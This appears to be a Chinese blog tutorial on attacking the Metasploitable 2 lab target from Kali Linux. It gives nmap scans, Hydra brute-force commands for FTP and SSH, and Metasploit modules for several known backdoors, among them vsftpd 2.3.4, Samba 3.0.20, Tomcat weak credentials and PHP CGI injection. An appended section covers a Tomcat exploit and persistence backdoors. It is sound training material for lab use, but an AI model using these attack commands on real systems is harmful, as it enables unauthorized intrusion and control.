kali渗透metasploitable靶机

本文详细介绍了一系列渗透测试技术,包括隐蔽扫描、端口爆破、利用已知漏洞获取系统权限等。通过具体案例演示如何使用Nmap进行隐蔽扫描,Hydra进行端口爆破,并借助Metasploit框架实现对目标系统的远程控制。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

扫描阶段:

工具:Nmap

隐蔽扫描      nmap  -sS 192.168.8.135


端口爆破:FTP、SSH等

工具:Hydra

备用字典

  • 爆破FTP

hydra -L  /root/Desktop/user.txt  -P  /root/Desktop/pass.txt  ftp://192.168.8.135

  • 爆破SSH

hydra -L  /root/Desktop/user.txt  -P  /root/Desktop/pass.txt  192.168.8.135 ssh

登陆系统:

端口渗透:

  • 6667——-irc_3281_backdoor

利用metasploit

成功获取会话,root权限

  • 6200——-vsftpd_234_backdoor

利用metasploit

反弹会话,root权限


  • 1524——-ingrelock_backdoor

利用telnet连接1524,直接返回root会话

  • 1099——-distcc程序漏洞—-ingrelock

利用metasploit

返回会话

  • 139——-samba为3.0漏洞

先用nmap进行详细扫描

nmap -v -A -T4 192.168.8.135

Samba 3.0.20

利用metasploit

返回会话,root权限

  • 8180——-Apache Tomcat弱口令

使用use auxiliary/scanner/http/tomcat_mgr_login进行账户爆破

用默认自带的字典即可

爆破出tomcat/tomcat

使用use exploit/multi/http/tomcat_mgr_upload模块

获取meterpreter会话

  • 80——-PHP CGI参数注入执行漏洞

msf > search cve:2012-1823

msf > use exploit/multi/http/php_cgi_arg_injection

msf exploit(php_cgi_arg_injection) > show options

msf exploit(php_cgi_arg_injection) > set rhost 192.168.8.135

rhost => 192.168.8.135

msf exploit(php_cgi_arg_injection) > run


### Kali Linux与Metasploitable 2靶机实验配置及渗透测试教程 #### 实验环境准备 在进行Kali Linux与Metasploitable 2靶机渗透测试实验前,需要确保实验环境已经正确配置。以下是详细的配置说明: 1. **安装Kali Linux虚拟机** - 下载并安装VMware或VirtualBox等虚拟化平台。 - 下载Kali Linux的ISO镜像文件,并创建一个新的虚拟机。 - 配置虚拟机的硬件资源,建议分配至少4GB内存以保证流畅运行[^1]。 2. **安装Metasploitable 2靶机** - 下载Metasploitable 2的压缩包(如`metasploitable-linux-2.0.0.zip`),并解压到指定目录[^4]。 - 使用虚拟化平台导入Metasploitable 2的虚拟机文件(通常是`.ova`格式)。 - 启动Metasploitable 2虚拟机,并配置其网络模式为桥接模式或NAT模式,确保能够与Kali Linux虚拟机通信[^3]。 3. **配置IP地址** - 在Kali Linux中,使用`ifconfig`或`ip addr`命令查看本机IP地址。 - 在Metasploitable 2中,手动设置静态IP地址为`192.168.22.100`,子网掩码为`255.255.255.0`[^1]。 #### 渗透测试步骤 1. **启动Metasploit框架** 在Kali Linux终端中输入以下命令启动Metasploit框架: ```bash msfconsole ``` 2. **漏洞扫描** 使用Nmap工具对Metasploitable 2靶机进行端口扫描和漏洞探测: ```bash nmap -sV -p- 192.168.22.100 ``` 上述命令将扫描目标主机的所有端口,并尝试识别服务版本信息[^1]。 3. **利用已知漏洞** 根据Nmap扫描结果选择合适的漏洞利用模块。例如,如果发现存在Tomcat管理界面的弱密码漏洞,可以使用以下命令加载相应的Metasploit模块: ```bash use exploit/multi/http/tomcat_mgr_deploy set RHOSTS 192.168.22.100 set PASSWORD tomcat set USERNAME tomcat exploit ``` 4. **后渗透测试** 成功获取目标系统的访问权限后,可以进一步执行以下操作: - 提升权限:使用`getsystem`命令尝试提升当前会话的权限。 - 搜集系统信息:使用`sysinfo`命令查看目标系统的详细信息。 - 部署持久化后门:使用` persistence`模块实现长期控制目标系统。 #### 注意事项 - 确保所有操作仅在授权的实验环境中进行,避免对真实网络或设备造成影响[^2]。 - 在实验过程中记录每一步的操作日志,以便后续分析和学习。 ```python # 示例代码:自动化扫描脚本 import os def scan_target(ip): os.system(f"nmap -sV -p- {ip}") scan_target("192.168.22.100") ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值